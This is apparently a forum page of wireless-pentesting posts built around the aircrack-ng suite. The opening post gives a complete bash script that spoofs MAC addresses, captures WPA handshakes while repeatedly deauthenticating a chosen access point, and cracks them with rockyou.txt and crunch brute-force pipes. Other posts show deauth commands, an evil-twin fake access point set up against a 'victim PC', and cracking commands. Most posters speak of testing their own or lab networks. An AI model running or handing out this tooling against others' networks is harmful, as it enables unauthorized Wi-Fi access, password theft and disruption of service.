Search the Community

This my first (more than 5 line) bash script. If you have any suggestions/tips for improvment, I'm all ears. Its designed to run on kali, but should be easily portable to other pentesting distros (or it might work right out of the box, idk i havent tested with anything else). What it does: 1. Starts a moniter mode on the interface of your choosing. 2. Spoofs you MAC if you so desire. 3. Runs airodump-ng. 4. Prompts user for a BSSID/channel. 5. Creates a ~/Handshakes folder in your home directory. 6. Dumps the user specified network traffic to the created ~/Handshakes folder. 7. While dumping traffic opens an xterm window that deauthenticates the previously specified AP. 8. Asks the user if they would like to start again from step 3. 9. Shuts down mon0, changes back to perment mac (if they want). 10. Gives the user the a number of options for attacking the handshake with aircrack-ng, these include: a) Running the preincluded rockyou.txt in kali (automaticlly decompresses). b) A number of bruteforce attacks. (7 predefined options) c) Allows the user to pass there own arguments to crunch. RAW code: #!/bin/bash clear echo "" #Configuration: HANDSHAKE='/root/Handshakes/HandShake*.cap' WORDLIST='/usr/share/wordlists/rockyou.txt' MONITER=mon0 #End configuration echo "***************************************" echo "***********AIRCRACKED V-2.0************" echo "***************************************" echo "** **" echo "** Wrtten by @thisguysayswht **" echo "** Email: hofmanjosh555@yahoo.com **" echo "** **" echo "** Usage: **" echo "** **" echo "** Starts moniter interface **" echo "** Spoofs MAC adderss **" echo "** Runs airodump-ng **" echo "** Creates Handshake directory **" echo "** Dumps specified network traffic **" echo "** Deauthenticates specified AP **" echo "** Captures handshake **" echo "** Restores wireless interfaces **" echo "** Runs aircrack-ng **" echo "** **" echo "***************************************" echo "***************************************" echo "" echo "" echo "========Press enter to continue========" read START if [[ $START == "" ]]; then sleep 2 clear fi #Use at your own risk... echo "---------------------------------------------------" echo "-Would you like to start a moniter interface[y/n]?-" echo "---------------------------------------------------" echo "" read MONIF if [[ $MONIF == 'y' ]]; then echo "" iwconfig echo "Please select a wireless interface from above" echo "" read WIRELESS [[ $WIRELESS == "" ]] sleep 2 clear echo "Starting interface on $WIRELESS..." sleep 2 airmon-ng start $WIRELESS sleep 4 clear else echo "" echo "Skipping..." sleep 2 clear fi echo "----------------------------------------" echo "-Would you like to spoof your MAC[y/n]?-" echo "----------------------------------------" echo "" read MACSPF if [[ $MACSPF == 'y' ]]; then echo "" echo "Shutting down all wireless interfaces..." echo "" sleep 2 ifconfig $WIRELESS down ifconfig $MONITER down echo "Changing to random MAC..." echo "" sleep 2 macchanger -r $WIRELESS macchanger -r $MONITER echo "" echo "Bringing spoffed interfaces up..." echo "" sleep 4 clear ifconfig $WIRELESS up ifconfig $MONITER up else echo "" echo "Skipping..." sleep 2 clear fi while true do clear echo "--------------------------------------------------" echo "-Would you like to dump the network traffic[y/n]?-" echo "--------------------------------------------------" echo "" read DUMP if [[ $DUMP == 'y' ]]; then echo "" echo "Dumping network traffic...[Ctrl-C to stop]" sleep 4 airodump-ng $MONITER else echo "" echo "Skipping..." sleep 2 clear fi echo "---------------------------------------------" echo "-Would you like to capture a handshake[y/n]?-" echo "---------------------------------------------" echo "" read HANDC if [[ $HANDC == 'y' ]]; then echo "" echo "Creating directory Handshakes..." echo "" sleep 2 cd ~ mkdir Handshakes &> /dev/null echo "" echo "Please enter the network BSSID:" echo "" read BSSID [[ $BSSID == "" ]] echo "" echo "Please enter the network channel:" echo "" read CHNEL [[ $CHNEL == "" ]] airodump-ng --ig -w Handshakes/HandShake -c $CHNEL --bssid $BSSID $MONITER & sleep 6 && xterm -hold -e "while true; do sleep 5; aireplay-ng -0 5 -q 2 --ig -a $BSSID $MONITER; done" && exec -c clear else echo "" echo "Skipping..." sleep 2 clear fi echo "---------------------------------------------------" echo "-Would you like to capture another handshake[y/n]?-" echo "---------------------------------------------------" echo "" read AGAIN if [[ $AGAIN == "n" ]]; then break echo "" echo "Skipping..." sleep 2 clear fi done clear echo "-----------------------------------------------------------------------" echo "-Would you like to restore your previous interface configuration[y/n]?-" echo "-----------------------------------------------------------------------" echo "" read RESTOR if [[ $RESTOR == "y" ]]; then echo "" echo "Disabling moniter mode..." sleep 2 airmon-ng stop $MONITER echo "Shutting down main wireless interface..." echo "" sleep 2 ifconfig $WIRELESS down echo "Restoring perment MAC..." echo "" sleep 2 macchanger -p $WIRELESS echo "" echo "Bringing main wireless interface back up..." echo "" sleep 2 ifconfig $WIRELESS up echo "Wireless interfaces restored" echo "" sleep 4 clear else echo "" echo "Skipping..." sleep 2 clear fi while true do clear echo "*****************************************************" echo "*******************Select option*********************" echo "*****************************************************" echo "** **" echo "** 1. View handshakes (Ctrl-C to exit) **" echo "** 2. Use rockyou.txt (4 hours) **" echo "** 3. Bruteforce 8 numeric (1 day 6 hrs) **" echo "** 4. Bruteforce 9 numeric (12 days) **" echo "** 5. Bruteforce 10 numeric (4 months) **" echo "** 6. Bruteforce 8 a-z (7 years) **" echo "** 7. Bruteforce 8 A-Z (7 years) **" echo "** 8. Bruteforce 8 a-z + numeric (91 years) **" echo "** 9. Bruteforce 8 A-Z + numeric (91 years) **" echo "** 10. Bruteforce 8 a-z + A-Z (1719 years) **" echo "** 11. Bruteforce custom (???) **" echo "** **" echo "*****************************************************" echo "**********All calculations done @1000 pmk/s**********" echo "*****************************************************" echo "" read n case $n in 1)(xterm -hold -e aircrack-ng $HANDSHAKE) & ;; 2)clear echo "Decompressing rockyou.txt..." gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null echo "" sleep 2 echo "Starting attack..." sleep 3 aircrack-ng -w $WORDLIST $HANDSHAKE echo "" read -p "Press any key to return to script";; 3)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 numeric" echo "" crunch 8 8 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 4)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 9 numeric" echo "" crunch 9 9 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 5)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 10 numeric" echo "" crunch 10 10 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 6)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 7)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z" echo "" crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 8)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z numeric" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 9)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z numeric" echo "" crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 10)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z A-Z" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 11)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "What arguments would you like to pass to crunch?" echo "" read CRUNCH [[ $CRUNCH == "" ]] echo "" echo "Starting custom bruteforce attack" echo "" crunch $CRUNCH|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; *)clear echo "Invalid option" echo "" read -p "Press any key to return to script";; esac sleep 1 done Executable: Apparetly it wont let me upload "this kind of file", if anyone has a workaround let me know. For now just copy/paste into a text editor, save, and chmod -x /the/file in a terminal (or right click >permissions>allow executing of this file) Disclaimer: This code was written for educational purposes only. I am not responsible for what you do with this code. If this code sets your computer on fire, I am not responsible. If you use this code irresponsibly, and the FBI kicks your door down, I am not responsible. This code is designed to test the security of your router, and not anyone else's. If this code gets you laid, I might take responsibility. If you use this code, you are agreeing that it is at your own risk.

Hey. I'm having some trouble kicking clients off a certain access point. Everything seems to be working fine, until i launch the aireplay-ng deauth attack, I have double checked the MAC addresses, of both the AP and client. I tried changing the channel manually when I set up airmon-ng wlan0 'channel' to match the AP but it doesn't seem to help. Commands i use: Sudo ifconfig wlan0 down sudo airmon-ng start wlan0 sudo airodump-ng mon0 sudo aireplay -0 0 -a 'MAC of access point' -c 'MAC of client' mon0 It replies: "Waiting for beacon frame (BSSID: "...") on channel 9 "No such BSSID available" I have tried putting in the ESSID insted with -e "ESSID of access point", but it returns the same. There's a link for screenshots here: https://imgur.com/a/Q7c8t Any suggestions ?

So I have been following this tutorial: https://m.wikihow.com/Hack-WPA/WPA2-Wi-Fi-with-Kali-Linux#step_2_17 And I haven't been able to get any WPA handshake. I use Kali Linux (latest 64-bit) on a live usb stick (8GB).

Noob question, so apologies off the bat. How do I transfer files from .cap (aircrack-ng handshakes) to Cain? Every time I try, Cain says there are no handshakes, although Aircrack-ng and JTR show there is. I would rather use Cain instead of the VM because of the GPU speed

I want to make a website so that I can crack wpa handshake on it just like gpuhash.me and

I have been working around the Evil Twin Airbase-ng for quite a while and i am unable to get my victim PC which is my other windows 10 machine to connect; It did connect to the AP once(rarely) and when it did it had no internet connect which has kept me up for sometime, i am going to post the proccess i have performed please go through them and guide me through the issue. Note:i have tried iptables and echo 1 it didnt help Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode airmon-ng start wlan0 Checking for background proccesses that can interfere with the work airmon-ng check wlan0mon(assigned new name) Setting up the Fake AP airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon 17:19:25 Created tap interface at0 17:19:25 Trying to set MTU on at0 to 1500 17:19:25 Trying to set MTU on wlan0mon to 1800 17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started. 17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan" 17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" 17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan" Deauthorizing clients on another terminal aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon 17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6 Installing DHCP server apt-get install isc-dhcp-server Reading package lists... Done Building dependency tree Reading state information... Done isc-dhcp-server is already the newest version (4.3.5-3+b1). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded. Configuring nano /etc/dhcp/dhcpd.conf authoritative; subnet 192.168.1.0 netmask 255.255.255.0 { option broadcast-address 192.168.1.255; option routers 192.168.1.1; option domain-name-servers 8.8.8.8; range 192.168.1.10 192.168.1.200; default-lease-time 600; max-lease-time 7200; } Installing bridging utilities apt-get install bridge-utils Reading package lists... Done Building dependency tree Reading state information... Done bridge-utils is already the newest version (1.5-14). The following packages were automatically installed and are no longer required: casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140 libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2 libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160 libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0 libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5 libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5 libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5 libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3 libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18 libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0 libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1 maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn python3.5 python3.5-minimal tcpd Use 'apt autoremove' to remove them. 0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded. Bridging interface root@kali:~# brctl addbr evil \\Name of the bridge i made root@kali:~# brctl addif evil eth0 \\my ethernet connection root@kali:~# brctl addif evil at0 root@kali:~# ifconfig at0 0.0.0.0 up root@kali:~# ifconfig evil up Starting DHCP server root@kali:~# systemctl start smbd.service root@kali:~# dhclient evil root@kali:~# service isc-dhcp-server restart root@kali:~# service isc-dhcp-server status ? isc-dhcp-server.service - LSB: DHCP server Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled) Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago Docs: man:systemd-sysv-generator(8) Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS) Tasks: 1 (limit: 4915) CGroup: /system.slice/isc-dhcp-server.service +-2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0 Dec 06 17:32:33 kali systemd1: Starting LSB: DHCP server... Dec 06 17:32:33 kali isc-dhcp-server2049: Launching IPv4 server only. Dec 06 17:32:33 kali dhcpd2060: Wrote 11 leases to leases file. Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same subnet: eth0 evil Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same shared network: eth0 evil Dec 06 17:32:33 kali dhcpd2061: Server starting service. Dec 06 17:32:35 kali isc-dhcp-server2049: Starting ISC DHCPv4 server: dhcpd. Dec 06 17:32:35 kali systemd1: Started LSB: DHCP server. /etc/init.d/isc-dhcp-server start ok Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service. IP gateway root@kali:~# route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0 0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0

To keep things short I've been experimenting with cracking wpa in aircrack. Everything works fine except a handshake is never captured as I am told when I go to run aircrack against the .cap file. I am using the panda PAU09 which plenty of people say works great, and yes the deauth command does work. I'm testing this in a home lab type set up so I know for sure the device reconnects to the AP, but for some reason I cannot capture the handshake. I am using the latest version of kali linux on the rpi, but have also tried on parrot sec os with the same issue I an following this guide ( https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/ ) to the point, substituting my ap's mac. When I use airodump APs show up but connected clients do not. Please help

Hi, let me give you some introduction: I bought the nano months ago and pentested some of my old routers. Unfortunately I had to realize that the nano only can handle the 2.4 GHz frequency, but no problem, great product anyway. Most newer routers support both 2.4 to 5 GHz, so I decided to buy the tetra to continue pentesting with my network that has one brand new access point with both frequencies up at the same time. The start with the tetra was great, because with the "Recon" tab it's possible to scan both frequencies at the same time. Sorry I'm not a fan of the "Modules" so I always continue with an ssh connection and use the aircrack-ng tools. Here comes the question: Why can I scan my networks (2.4 and 5 GHz on same AP), but the injection does not work on the 5 GHz frequency? I know that the MAC Address changes in the last character, but I started to airodump my 5 GHz and fixed the channel (also tried different ones), but it is still not working. What am I doing wrong? Screenshots included. Scan results: http://i.imgur.com/2QV8OkJ.png Airodump: http://imgur.com/taEl4EY Aireplay: http://imgur.com/wRSW3ed Second test with another router (also dual frequencies): I'm wondering how I can capture my WPA2 handshake when I'm connected to the 2.4 GHz frequency and when I try to deauth my phone for example, it will reconnect to the 5 GHz frequency without giving the handshake. Same goes if I'm connected to the 5 GHz first and deauth it, the reconnect goes to the 2.4 GHz. I know that is normal behavior for modern devices, but can you please give me some advices how to handle this? Maybe a script with a loop of switching frequenies and deauth could work? Thank You!

Is it possible to apply a filter to airodump-ng to show AP's with a similar ESSID. e.g ACME1234, ACME5678 ? obviously it can be done with BSSID's by applying a mask, but I can't find any examples that show it being applied to the ESSID. can someone please advise? Thank you.

What USB wireless adapter do you recommend for use with Kali Linux, Hostapd, Aircrack-NG, Mana, Karma, FruityWiFi, Ghost Phisher, Wifi HoneyPot, etc? What do you think of the Alfa AWUS051NH or the Alfa AWUS051NH v2?

I need a 12 character AZ 09 wordlist. When I try to make one with Crunch on Kali the size is astronomical. It would be nice to be able to have crunch create a list for me that automatically prunes itself to keep a constant size consistent with the passwords per-second. http://lastbit.com/pswcalc.asp is suggesting to try every AZ09 12 digit password would probably take well longer than my lifetime. Regardless if anyone knows how to make a self deleting wordlist I would be interested to learn even if it will not be utilized where I imagined it being used. Thanks everyone.

Hello! My professor gave me a pineapple nano and told me to learn how to use it. I am currently working on breaking WPA. I have the handshake and I have a password list (I used my home network) the list does have the password on it but when I go to break it on the pineapple with aircrack-ng I get the following output. Command entered: aircrack-ng WPAcrack-01.cap -w /sd/passList.lst Output Opening WPAcrack-01.cap Read 151 packets. No networks found, exiting. Quitting aircrack-ng... Thanks for any help!

Hello everyone, I have a question with respect to the aireplay-ng. I was successfully able to perform deauthentication with it. But as far as i know it sends 64 packets to the client and 64 to the access point, Then how does the number of acks received goes above 64. In the aireplay-ng official website it is said that because of active participation it goes above 64. Can anyone give me a clear idea about it. I have also attached a screenshot .

Hello internet trolls and geniouses. I like to live in commandline and I considder my self ok in linux. Usually i just use airbase ng, make a soft ap and dhcp on the at_interface. No stress no problem. But i resently bought a pineapple to use it as a tiny toolbox when pentesting on wireless systems. So my idea was to ssh to the pineapple, set up a ap and use wireshark's remote sniffing. Works fine, except all the packets on the at_interface comes out as malformed packets. Also when using airbase-ng i can connect to the nettwork but i canntot get dhcp. I have tried to add it to the bridged adapter and i have tried to use udhcpc. I cant get dhcp no matter what, and i cant sniff poackets. i can sniff packets on every other interface, no problem. I cant only get dhcp trough eternet or the default pineapple wifi nettwork. ---So im wondering if i need to configure somthing or if this is a bug in the pineapple, seeing as it works if i use a normal usb-wifi card, insted of ssh-ing to the pineapple. ---Is there a "blank version" where i can just install aircrack, dhcp3 and leave it there? ---it might also be my noobieness with the pineapple.... so If anyone have done this on the pineapple please help me a bit, i would aprechiate it! Sorry for my spelling.

Has anyone ever gotten besside-ng on a WiFi Pineapple? I looked briefly at getting the SVN version compiled on WiFi Pineapple, but it's not trivial given the lack of development tools (understandably, it's not a dev. platform.) Before I start delving deeper, just want to make sure I'm not duplicating someone elses effort.

I am getting somewhere now. attacking my home network to try and coax out the key. However when I go to do aircrack to reference the list I get this root@Pineapple:~# aircrack-ng ENTER201-01.cap -w /pentest/passwords/wordlists/darkc0de.lst fopen(dictionary) failed: No such file or directory fopen(dictionary) failed: No such file or directory Opening ENTER201-01.cap Read 2664 packets. # BSSID ESSID Encryption 1 C8:D7:19:CF:7A:24 Enter201 WPA (1 handshake) Choosing first network as target. Opening ENTER201-01.cap Please specify a dictionary (option -w). Please help

The heat is here; no more complaining of cold. Car stereos with huge bass with rap that blares with rappers of new and old. I have moved from my old digs; out to anew. Transferring my internet, is yet to be done. Out comes the Alfa, sniffing wpa2. Ifconfig wlan1 down... like a rerun. IW REG SET BO ... for extended range for more fun. Ifconfig wlan1 up... it is time for a game. The rules are simple, and plain. FInding who set their router with safe WPA. Kind of lame... but hell... I am at home with boxes surrounding me with no internet... how did he write this, though.... Have fun and stay cool!

For the full tour of the application, please view http://www.elithecomputerguy.com/ETCGCommunity/index.php?do=/forum/thread/65/aircrack-ngui/. Mods, I am not redirecting to another site for any ad purposes. Merely because you have an image limit. So, the abridged version. My program is a graphical interface to Aircrack-NG, dsniff, and nmap (at least the main part). If you go to "Other Tools", it includes other network/computer security tools that you can use (including Wireshark, MAC Changer, BURP Suite, TOR Network). My overall goal of the application is to be a "swiss army knife" for those learning network security and network professionals alike. Let me know if you can help develop, run quality control, or beta test. It's currently up on BitBucket and you can get the link from http://aircrackngui.blogspot.com. Also, let me know what you think. Good idea, bad idea, done too often, doesn't compete with other suites like it? Thank you for your time.

After watching a couple videos of using the aircrack-ng suite covered in both Ubuntu 12.04 and BackTrack 5R3, I was intrigued to try this on my own network. I have installed the most recent application and got to work. First Terminal: airmon-ng start wlan0 airodump-ng mon0 airdump-ng "My Network" --write file (started capturing) Second Terminal: aireplay-ng -0 3 -c -a mon0 (error occurs here) Waiting for beacon frame (BSSID) on channel -1 mon0 is on channel -1, but the AP uses channel 11 I've tried to look up solutions, and one was to patch the compat-wireless driver. I did so, and still get this result. I've read that I need to start both airmon-ng and airodump-ng with specific channel associations, 11. I do this and still nothing. While I am airodumping, the terminal lines running state my channel is fixed to -1. CH 11 ][ fixed channel mon0: -1 I like to use Ubuntu for this rather than BT5R3 because its a little better in my opinion, but I get the exact same issue using it. Either way, if there is some solution, it would be much appreciated. Asus K53E Intel i5 Processor 8GB Ram, 500GB HDD AR9485 Wireless Network Adapter Ubuntu 12.04 & Windows 8

I am using BT5 R3 on a laptop. My router is a wrt54g with dd-wrt v24. Is there anyway I can link wlan0 or mon0 directly to the router either wired or hopefully wirelessly. So when I run airodump-ng mon0 it will be using the routers antenna? I have been looking into airtun-ng but no luck so far.

Hi, i have been following the show for more than four years and have pretty much gone though all the esisodes. I Love it. I have bumped into a small yet irritating problem and as we all know google has the answer to everything. I tried googling, I didn't find any specific answer. I have tried using WIFIslax and have gone through the SLAX a little bit. THE PROBLEM is the installed language SPANISH. I don't speak or understand spanish and tried different ways to solve it. As many you know the WIFIslax version 4.2 Final is out. All the updates are lovely except one... theres no option to boot it in english. So I tried something. I copied the "009-english.xzm" from the WIFIslax 4.1 ISO and put it in the base folder... My trick did work out. I got English menu and interface, but certain menus and programs has not changed. I am not concerned with the menu items but airoscript-ng and other Wifi auditing program is still speaking spanish. It might not be of any importance to people who understand Espanol but it BIG for us, who does not understand a word of it. It is painfull during a Audit. And i am clueless about how to solve this. I understand that a lot of Linux Gurus including Darren are meditating over here, perhaps to them it is not such a big deal. I was hoping to find the answers over here... Can You please help me with this? Any way around? I appreciate you help...